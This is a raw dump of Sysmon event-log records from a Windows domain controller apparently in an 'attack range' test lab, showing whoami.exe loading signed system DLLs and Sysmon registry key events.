12241200x800000000000000057346578Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346577Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346576Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346575Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346574Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346573Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346572Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057346571Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\authz.dll10.0.14393.1737 (rs1_release_inmarket.170914-1249)Authorization FrameworkMicrosoft® Windows® Operating SystemMicrosoft Corporationauthz.dllMD5=6BAADF6A3E985DE5AB6FDA778E18F1A5,SHA256=8FD060B0F29A1FB23C3D1F389C22EC067247F1E457F331D2B15AE44323ECB8D0trueMicrosoft WindowsValid 12241200x800000000000000057346570Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346569Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346568Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346567Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346566Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346565Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346564Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346563Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346562Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 534500x800000000000000057346561Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.540{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exe 12241200x800000000000000057346560Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346559Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.540{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057346558Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346557Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057346556Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346555Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346554Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346553Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346552Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346551Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057346550Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 12241200x800000000000000057346549Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346548Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346547Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346546Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346545Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346544Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346543Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346542Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346541Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346540Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346539Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346538Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346537Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346536Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346535Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346534Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 12241200x800000000000000057346533Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057346532Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057346531Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057346530Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057346529Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 12241200x800000000000000057346528Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057346527Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 734700x800000000000000057346526Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 12241200x800000000000000057346525Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057346524Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346523Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057346522Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346521Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346520Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346519Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346518Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346517Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346516Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346515Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346514Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 12241200x800000000000000057346513Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346512Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346511Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346510Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057346509Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057346508Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057346507Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057346506Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057346505Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.509{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exeMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88AtrueMicrosoft WindowsValid 12241200x800000000000000057346504Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346503Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 12241200x800000000000000057346502Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:34.524{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057346501Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057346500Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057346499Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057346498Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057346497Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057346496Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057346495Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057346494Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:34.524{8B6011A9-5B9A-618E-4EF3-04000000F101}9320C:\Windows\System32\whoami.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 